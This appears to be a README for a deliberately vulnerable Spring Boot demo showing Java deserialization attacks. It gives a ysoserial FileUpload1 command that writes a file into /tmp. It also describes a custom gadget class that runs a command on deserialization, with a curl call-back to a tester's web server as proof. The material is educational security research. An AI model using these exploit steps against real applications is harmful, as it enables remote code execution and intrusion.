• How to Run:

  • Run via mvn spring-boot:run

• Routes:

  • Read blub.txt file: Visit /file-test?file=blub.txt
  • Serialize:
    • Get a serialized Book object: Visit /serialize?doUrlEncode=false
    • Get a serialized Book object that is also URL encoded: Visit /serialize?doUrlEncode=true
  • Deserialize:
    • GET: Visit GET /deserialize?b=<base64book_UrlEncoded>
    • POST: Visit POST /deserialize and provide the object-to-deserialize in the body

• Exploiting a Gadget Chain (that still works as of August 2022!):

  • As a PoC, the pom.xml contains commons-fileupload:1.3.1 and commons-io:2.4
  • Thus, we can use the FileUpload1 gadget chain from ysoserial: java -jar ysoserial.jar FileUpload1 'write;/tmp;HACKEEED' | base64
  • We send this to our Spring Boot app, which will create a randomly named file (e.g. /tmp/upload_1e2897d1_aac7_4210_8911_57cbb6ac37c0_00000000.tmp) in /tmp with the content HACKEEED

• We also created our own Gadget Chain -> BookRceReadObject (uses the gadget readObject)

  • General Description:
    • We created a new class BookRceReadObject.java that execute a command upon deserialization
    • We also create a separate mini app Evil.java where we serialize an instance of this class, give it a command of our choosing, and then send the serialized base64-encoded string to POST /deserialize
  • Command to Execute:
    • You can adjust the command to execute in Evil.java (this can't be done via a command line argument for now - Boo, I know.)
  • Setup:
    • We first compile Evil.java via javac Evil.java BookRceSetter.java BookRceSetter.java
    • Now, we cd into the /src/main/java folder, and run java com.example.my.tests.Evil
    • We now use the generated file naughty_BookRceReadObject.ser that contains a base64 encoded version of our serialized payload
  • Exploitation:
    • PoC - curl:
      • We run a web server via python3 -m http.server 82
      • Now, we adjust the IP address of the curl command in Evil.java to wherever this web server is running
      • Last, we send a request to our API:
        POST /deserialize
        Content-Type: application/json
        
        <content of naughty_BookRceReadObject.ser>
      • If everything works, our web server gets hit

• Testing Setter Gadget Chain -> Not working

  • We also create BookRceSetter.java which would execute a command upon calling a setter
    • Our idea is that a setter might be automatically invoked upon deserialization (to set the corresponding value)
  • We do the same steps as in the above section, send the payload from naughty_BookRceSetter.ser to /POST deserialize...
    • But it's not working.. Our command does not execute...